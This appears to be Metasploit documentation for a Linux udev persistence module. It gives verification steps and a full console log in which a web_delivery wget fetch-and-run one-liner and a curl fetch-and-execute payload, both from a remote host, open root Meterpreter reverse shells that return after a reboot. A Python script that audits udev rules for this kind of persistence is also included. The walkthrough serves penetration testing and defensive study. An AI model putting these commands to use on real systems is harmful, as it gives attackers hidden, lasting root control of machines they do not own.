GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/persistence/udev.md

Vulnerable Application

This is a post module that performs a persistence installation on a Linux system using udev. The persistence execution will be triggered with root privileges every time a network interface other than lo comes up. Execution is triggered through the at command, so at must be installed on the target.
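For defenders, the behaviour described above (a udev rule that fires on network interface events and hands execution to at) can be audited in rules files. The following is an added example, not code from the module or the Metasploit project: the sample rules are constructed (the page does not show the rule text the module writes), and the function name and the list of unusual directories are assumptions.

```python
import re

# Constructed sample rules for illustration; not the rule text the module writes.
SAMPLE_RULES = r'''
SUBSYSTEM=="net", ACTION=="add", KERNEL!="lo", RUN+="/usr/bin/at -f /opt/EXAMPLE now"
SUBSYSTEM=="block", ACTION=="add", RUN+="/usr/lib/udev/hdparm"
ACTION=="add", SUBSYSTEM=="usb", RUN{builtin}+="kmod load usbhid"
ACTION=="add", SUBSYSTEM=="net", RUN+="/bin/sh -c 'echo /tmp/EXAMPLE | at now'"
'''

# key, operator, quoted value, e.g. SUBSYSTEM=="net" or RUN+="..."
TOKEN = re.compile(r'([A-Za-z_]+(?:\{[^}]*\})?)\s*(==|!=|\+=|-=|:=|=)\s*"((?:[^"\\]|\\.)*)"')
# at/batch as a command word: udev kills RUN children once the event is handled,
# so handing the job to atd is how a rule starts something that keeps running.
SCHEDULER = re.compile(r'''(?:^|[\s/|;&'])(?:at|batch)(?=\s|$)''')
# Paths outside package-managed helper directories (assumed list; tune per host).
ODD_PATH = re.compile(r'''(?:^|[\s'"=])(/(?:opt|tmp|var/tmp|dev/shm|home|root)/\S*)''')

def audit_rules(text):
    """Return (rule, reasons) for each rule whose RUN key looks like persistence."""
    findings = []
    # udev joins a line ending in a backslash with the next one
    for rule in text.replace("\\\n", " ").splitlines():
        rule = rule.strip()
        if not rule or rule.startswith("#"):
            continue
        tokens = TOKEN.findall(rule)
        reasons = []
        for key, op, value in tokens:
            # only RUN assignments that execute an external program
            if not key.startswith("RUN") or key == "RUN{builtin}" or op in ("==", "!="):
                continue
            if SCHEDULER.search(value):
                reasons.append("RUN hands off to at/batch")
            for path in ODD_PATH.findall(value):
                reasons.append("RUN references " + path)
        if reasons and ("SUBSYSTEM", "==", "net") in tokens:
            reasons.append("fires on network interface events")
        if reasons:
            findings.append((rule, reasons))
    return findings

if __name__ == "__main__":
    for rule, reasons in audit_rules(SAMPLE_RULES):
        print(rule, "->", "; ".join(reasons))
```

Feed it the contents of each file under /lib/udev/rules.d/ and /etc/udev/rules.d/. A flagged rules file that no installed package owns (for example, `dpkg -S` on the file returns nothing on Ubuntu) deserves a closer look.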

Verification Steps

  1. Start msfconsole

  2. Obtain a root session on the target machine

  3. use exploit/linux/persistence/udev

  4. set session -1

  5. exploit

Options

PAYLOAD_NAME

Name of the payload file to write. Defaults to random.

UDEV_PATH

Path to udev rules folder. Defaults to /lib/udev/rules.d/

UDEV_RULE

Rule name for udev. Defaults to random.

Scenarios

Module usage

Ubuntu 24.04

Initial shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2
lhost => 2.2.2.2
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4446
[*] Using URL: http://2.2.2.2:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Qjdo0XSK --no-check-certificate http://2.2.2.2:8082/l; chmod +x Qjdo0XSK; ./Qjdo0XSK& disown
msf exploit(multi/script/web_delivery) > [*] 1.1.1.1 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4446 -> 1.1.1.1:43842) at 2025-12-20 16:24:02 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 1.1.1.1
OS : Ubuntu 24.04 (Linux 6.8.0-31-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...

Persistence install

msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/udev
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/udev) > set session 1
session => 1
msf exploit(linux/persistence/udev) > set WritableDir /opt/
WritableDir => /opt/
msf exploit(linux/persistence/udev) > exploit
[*] Command to run on remote host: curl -so ./eULGakHgwKeL http://2.2.2.2:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./eULGakHgwKeL;./eULGakHgwKeL&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 2.2.2.2:8080
[*] HTTP server started
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
[*] Started reverse TCP handler on 2.2.2.2:4444
msf exploit(linux/persistence/udev) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. likely exploitable
[*] Writing '/opt//Z7CpOCzhzq' (271 bytes) ...
[+] /opt//Z7CpOCzhzq written
[+] /lib/udev/rules.d//41-EInB5urA.rules written
[*] Triggering udev rule
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/1.1.1.1_20251220.5601/1.1.1.1_20251220.5601.rc
[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:38100) at 2025-12-20 16:56:03 -0500

Trigger a reboot to test the persistence

msf exploit(linux/persistence/udev) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1394 created.
Channel 8 created.
reboot
[*] 1.1.1.1 - Meterpreter session 1 closed. Reason: Died
Terminate channel 8? [y/N] y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
msf exploit(linux/persistence/udev) > [*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 1.1.1.1:35550) at 2025-12-20 16:56:38 -0500
[*] 1.1.1.1 - Meterpreter session 2 closed. Reason: Died
msf exploit(linux/persistence/udev) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: root
meterpreter >